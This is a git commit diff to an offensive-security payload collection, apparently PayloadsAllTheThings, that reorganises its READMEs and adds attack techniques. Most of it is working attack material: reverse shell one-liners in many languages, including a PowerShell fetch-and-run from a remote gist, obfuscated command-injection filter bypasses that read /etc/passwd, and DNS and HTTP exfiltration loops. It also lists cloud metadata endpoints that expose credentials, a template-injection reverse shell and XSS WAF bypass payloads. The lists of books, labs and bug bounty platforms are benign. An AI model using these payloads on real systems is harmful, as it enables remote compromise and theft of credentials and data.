Multiple update in READMEs + RCE tricks
parent
b20cdde4d9
commit
177c12cb79
|
@ -2,14 +2,14 @@
|
|||
|
||||
## Reverse Shell Cheat Sheet
|
||||
|
||||
Bash TCP
|
||||
### Bash TCP
|
||||
```bash
|
||||
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
|
||||
|
||||
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
|
||||
```
|
||||
|
||||
Bash UDP
|
||||
### Bash UDP
|
||||
```
|
||||
Victim:
|
||||
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
|
||||
|
@ -19,7 +19,7 @@ nc -u -lvp 4242
|
|||
```
|
||||
|
||||
|
||||
Perl
|
||||
### Perl
|
||||
```perl
|
||||
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
|
||||
|
@ -30,17 +30,17 @@ NOTE: Windows only
|
|||
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
```
|
||||
|
||||
Python
|
||||
### Python
|
||||
```python
|
||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||
```
|
||||
|
||||
PHP
|
||||
### PHP
|
||||
```bash
|
||||
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
```
|
||||
|
||||
Ruby
|
||||
### Ruby
|
||||
```ruby
|
||||
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||||
|
||||
|
@ -51,23 +51,23 @@ ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.pope
|
|||
```
|
||||
|
||||
|
||||
Netcat Traditional
|
||||
### Netcat Traditional
|
||||
```bash
|
||||
nc -e /bin/sh [IPADDR] [PORT]
|
||||
```
|
||||
|
||||
Netcat OpenBsd
|
||||
### Netcat OpenBsd
|
||||
```bash
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
|
||||
```
|
||||
|
||||
Ncat
|
||||
### Ncat
|
||||
```bash
|
||||
ncat 127.0.0.1 4444 -e /bin/bash
|
||||
ncat --udp 127.0.0.1 4444 -e /bin/bash
|
||||
```
|
||||
|
||||
Powershell
|
||||
### Powershell
|
||||
```powershell
|
||||
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
|
@ -81,14 +81,14 @@ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40
|
|||
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
|
||||
```
|
||||
|
||||
Java
|
||||
### Java
|
||||
```java
|
||||
r = Runtime.getRuntime()
|
||||
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
|
||||
p.waitFor()
|
||||
```
|
||||
|
||||
NodeJS
|
||||
### NodeJS
|
||||
```javascript
|
||||
(function(){
|
||||
var net = require("net"),
|
||||
|
@ -102,8 +102,28 @@ NodeJS
|
|||
});
|
||||
return /a/; // Prevents the Node.js application form crashing
|
||||
})();
|
||||
|
||||
|
||||
or
|
||||
|
||||
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
|
||||
|
||||
or
|
||||
|
||||
-var x = global.process.mainModule.require
|
||||
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
|
||||
```
|
||||
|
||||
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
|
||||
```javascript
|
||||
String host="localhost";
|
||||
int port=8044;
|
||||
String cmd="cmd.exe";
|
||||
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
|
||||
```
|
||||
NOTE: Java reverse shell also work for Groovy
|
||||
|
||||
|
||||
## Spawn TTY
|
||||
```
|
||||
/bin/sh -i
|
||||
|
|
132
README.md
132
README.md
|
@ -29,46 +29,72 @@ You might also like :
|
|||
* Tomcat CVE-2017-12617.py
|
||||
|
||||
|
||||
## Tools
|
||||
* [Kali Linux](https://www.kali.org/)
|
||||
* [Web Developer](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
|
||||
* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) - Not compatible with Firefox Quantum
|
||||
* [Burp Proxy](https://portswigger.net)
|
||||
* [Fiddler](https://www.telerik.com/download/fiddler)
|
||||
* [DirBuster](https://sourceforge.net/projects/dirbuster/)
|
||||
* [GoBuster](https://github.com/OJ/gobuster)
|
||||
* [Knockpy](https://github.com/guelfoweb/knock)
|
||||
* [SQLmap](http://sqlmap.org)
|
||||
* [Nikto](https://cirt.net/nikto2)
|
||||
* [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner)
|
||||
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
|
||||
* [Wappalyzer](https://wappalyzer.com/download)
|
||||
* [Metasploit](https://www.metasploit.com/)
|
||||
* [OpenVAS](http://www.openvas.org/)
|
||||
## Try Harder
|
||||
Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
|
||||
|
||||
* __Bug Bounty Platforms__
|
||||
* [HackerOne](https://hackerone.com)
|
||||
* [BugCrowd](https://bugcrowd.com)
|
||||
* [Bounty Factory](https://bountyfactory.io)
|
||||
* [Synack](https://www.synack.com/)
|
||||
* [Intigriti](https://www.intigriti.com)
|
||||
* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
|
||||
* __Online Platforms__
|
||||
* [Hack The Box](hackthebox.eu/)
|
||||
* [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
|
||||
* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
|
||||
* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
|
||||
* [Root-Me](https://www.root-me.org)
|
||||
* [W3Challs](https://w3challs.com/)
|
||||
* [NewbieContest](https://www.newbiecontest.org/)
|
||||
* [Vulnhub](https://www.vulnhub.com/)
|
||||
* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
|
||||
* [alert(1) to win](https://alf.nu/alert1)
|
||||
* [Hacksplaining](https://www.hacksplaining.com/exercises)
|
||||
* [HackThisSite](https://hackthissite.org)
|
||||
* [Hackers.gg](hackers.gg)
|
||||
* [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
|
||||
|
||||
## Book's list
|
||||
Grab a book and relax, these ones are the best security books (in my opinion).
|
||||
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
|
||||
* [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
|
||||
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
|
||||
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
|
||||
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
|
||||
* [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
|
||||
* [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
|
||||
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
|
||||
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
|
||||
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
|
||||
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
|
||||
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
|
||||
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
|
||||
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
|
||||
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
|
||||
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
|
||||
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
|
||||
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
|
||||
|
||||
|
||||
## Online Challenges
|
||||
* [Hack The Box](hackthebox.eu/)
|
||||
* [Root-Me](https://www.root-me.org)
|
||||
* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
|
||||
* [W3Challs](https://w3challs.com/)
|
||||
* [NewbieContest](https://www.newbiecontest.org/)
|
||||
* [Vulnhub](https://www.vulnhub.com/)
|
||||
* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
|
||||
* [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html)
|
||||
* [alert(1) to win](https://alf.nu/alert1)
|
||||
* [Hacksplaining](https://www.hacksplaining.com/exercises)
|
||||
* [HackThisSite](https://hackthissite.org)
|
||||
* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
|
||||
* [Hackers.gg](hackers.gg)
|
||||
## More resources
|
||||
|
||||
## Bug Bounty
|
||||
* [HackerOne](https://hackerone.com)
|
||||
* [BugCrowd](https://bugcrowd.com)
|
||||
* [Bounty Factory](https://bountyfactory.io)
|
||||
* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
|
||||
### Blogs/Websites
|
||||
* [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
|
||||
* [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
|
||||
* [Tips from Top Hackers – Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
|
||||
* [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
|
||||
* [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
|
||||
* [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
|
||||
|
||||
## Docker
|
||||
### Youtube
|
||||
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
|
||||
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
|
||||
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
|
||||
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
|
||||
|
||||
|
||||
### Docker
|
||||
| Command | Link |
|
||||
| :------------- | :------------- |
|
||||
| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
|
||||
|
@ -83,37 +109,3 @@ You might also like :
|
|||
| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
|
||||
| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
|
||||
| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
|
||||
|
||||
|
||||
## More resources
|
||||
### Book's list:
|
||||
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
|
||||
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
|
||||
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
|
||||
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
|
||||
* [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
|
||||
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
|
||||
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
|
||||
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
|
||||
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
|
||||
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
|
||||
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
|
||||
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
|
||||
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
|
||||
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
|
||||
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
|
||||
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
|
||||
|
||||
### Blogs/Websites
|
||||
* http://blog.zsec.uk/101-web-testing-tooling/
|
||||
* https://blog.innerht.ml
|
||||
* https://blog.zsec.uk
|
||||
* https://www.exploit-db.com/google-hacking-database
|
||||
* https://www.arneswinnen.net
|
||||
* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
|
||||
|
||||
### Youtube
|
||||
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
|
||||
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
|
||||
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
|
||||
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
# Remote Commands Execution
|
||||
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
|
||||
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||
|
||||
|
||||
## Exploits
|
||||
|
@ -87,6 +88,13 @@ Bypass blacklisted word with $@
|
|||
who$@ami
|
||||
```
|
||||
|
||||
Bypass blacklisted word with variable expansion
|
||||
```powershell
|
||||
test=/ehhh/hmtc/pahhh/hmsswd
|
||||
cat ${test//hhh\/hm/}
|
||||
cat ${test//hh??hm/}
|
||||
```
|
||||
|
||||
Bypass zsh/bash/sh blacklist
|
||||
```powershell
|
||||
echo $0
|
||||
|
@ -94,6 +102,12 @@ echo $0
|
|||
echo whoami|$0
|
||||
```
|
||||
|
||||
## Challenge
|
||||
Challenge based on the previous tricks, what does the following command do:
|
||||
```powershell
|
||||
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
|
||||
```
|
||||
|
||||
|
||||
## Time based data exfiltration
|
||||
Extracting data : char by char
|
||||
|
@ -118,13 +132,9 @@ Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.
|
|||
for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
|
||||
```
|
||||
|
||||
## Environment based
|
||||
NodeJS Commands execution
|
||||
```powershell
|
||||
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
|
||||
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
|
||||
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
|
||||
* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
|
||||
|
|
|
@ -1,6 +1,23 @@
|
|||
# Server-Side Request Forgery
|
||||
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
|
||||
|
||||
## Summary
|
||||
* [Exploit with localhost]()
|
||||
* [Bypassing filters]()
|
||||
* [SSRF via URL Scheme]()
|
||||
* [SSRF to XSS]()
|
||||
* [SSRF URL for Cloud Instances]()
|
||||
* [SSRF URL for AWS Bucket]()
|
||||
* [SSRF URL for Google Cloud]()
|
||||
* [SSRF URL for Digital Ocean]()
|
||||
* [SSRF URL for Packetcloud]()
|
||||
* [SSRF URL for Azure]()
|
||||
* [SSRF URL for OpenStack/RackSpace]()
|
||||
* [SSRF URL for HP Helion]()
|
||||
* [SSRF URL for Oracle Cloud]()
|
||||
* [SSRF URL for Alibaba]()
|
||||
|
||||
|
||||
## Exploit with localhost
|
||||
|
||||
Basic SSRF v1
|
||||
|
@ -203,8 +220,9 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
|
|||
```
|
||||
|
||||
|
||||
|
||||
## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
|
||||
## SSRF URL for Cloud Instances
|
||||
### SSRF URL for AWS Bucket
|
||||
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
|
||||
Interesting path to look for at http://169.254.169.254
|
||||
```
|
||||
Always here : /latest/meta-data/{hostname,public-ipv4,...}
|
||||
|
@ -253,7 +271,7 @@ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
|
|||
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
|
||||
```
|
||||
|
||||
## SSRF URL for Google Cloud
|
||||
### SSRF URL for Google Cloud
|
||||
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
|
||||
```
|
||||
http://169.254.169.254/computeMetadata/v1/
|
||||
|
@ -275,7 +293,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
|
|||
```
|
||||
|
||||
|
||||
## SSRF URL for Digital Ocean
|
||||
### SSRF URL for Digital Ocean
|
||||
https://developers.digitalocean.com/documentation/metadata/
|
||||
```powershell
|
||||
curl http://169.254.169.254/metadata/v1/id
|
||||
|
@ -291,12 +309,12 @@ All in one request:
|
|||
curl http://169.254.169.254/metadata/v1.json | jq
|
||||
```
|
||||
|
||||
## SSRF URL for Packetcloud
|
||||
### SSRF URL for Packetcloud
|
||||
```
|
||||
https://metadata.packet.net/userdata
|
||||
```
|
||||
|
||||
## SSRF URL for Azure
|
||||
### SSRF URL for Azure
|
||||
Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
|
||||
```
|
||||
http://169.254.169.254/metadata/v1/maintenance
|
||||
|
@ -308,19 +326,19 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
|
|||
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
|
||||
```
|
||||
|
||||
## SSRF URL for OpenStack/RackSpace
|
||||
### SSRF URL for OpenStack/RackSpace
|
||||
(header required? unknown)
|
||||
```
|
||||
http://169.254.169.254/openstack
|
||||
```
|
||||
|
||||
## SSRF URL for HP Helion
|
||||
### SSRF URL for HP Helion
|
||||
(header required? unknown)
|
||||
```
|
||||
http://169.254.169.254/2009-04-04/meta-data/
|
||||
```
|
||||
|
||||
## SSRF URL for Oracle Cloud
|
||||
### SSRF URL for Oracle Cloud
|
||||
```
|
||||
http://192.0.0.192/latest/
|
||||
http://192.0.0.192/latest/user-data/
|
||||
|
@ -328,7 +346,7 @@ http://192.0.0.192/latest/meta-data/
|
|||
http://192.0.0.192/latest/attributes/
|
||||
```
|
||||
|
||||
## SSRF URL for Alibaba
|
||||
### SSRF URL for Alibaba
|
||||
```
|
||||
http://100.100.100.200/latest/meta-data/
|
||||
http://100.100.100.200/latest/meta-data/instance-id
|
||||
|
|
|
@ -5,10 +5,11 @@
|
|||
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
||||
e.g:
|
||||
```
|
||||
./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
|
||||
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
|
||||
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
|
||||
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
|
||||
```
|
||||
|
||||
|
||||
## Ruby
|
||||
### Basic injection
|
||||
```python
|
||||
|
@ -22,7 +23,7 @@ e.g:
|
|||
|
||||
|
||||
## Java
|
||||
### Basic injection
|
||||
### Basic injection
|
||||
```java
|
||||
${7*7}
|
||||
${{7*7}}
|
||||
|
@ -174,6 +175,13 @@ Inject this template
|
|||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||
```
|
||||
|
||||
## AngularJS
|
||||
### Basic injection
|
||||
```javascript
|
||||
$eval('1+1')
|
||||
{{1+1}}
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||
|
|
|
@ -18,8 +18,9 @@
|
|||
5. The content of the cache is displayed
|
||||
```
|
||||
|
||||
[![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
|
||||
[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
|
||||
Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
|
||||
|
||||
## Thanks to
|
||||
* http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html
|
||||
* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
|
||||
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
|
|
@ -644,6 +644,12 @@ Exotic payloads
|
|||
|
||||
## Common WAF Bypass
|
||||
|
||||
### Chrome Auditor - 9th august
|
||||
```javascript
|
||||
</script><svg><script>alert(1)-%26apos%3B
|
||||
```
|
||||
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
|
||||
|
||||
### Incapsula WAF Bypass - 8th march
|
||||
```javascript
|
||||
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||
|
@ -663,10 +669,10 @@ Use notification box instead of an alert - by [@brutelogic](https://twitter.com/
|
|||
Note : it requires user permission
|
||||
```
|
||||
Notification.requestPermission(x=>{new(Notification)(1)})
|
||||
|
||||
Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//
|
||||
```
|
||||
|
||||
Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
|
||||
|
||||
|
||||
## Thanks to
|
||||
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
|
||||
|
|
Loading…
Reference in New Issue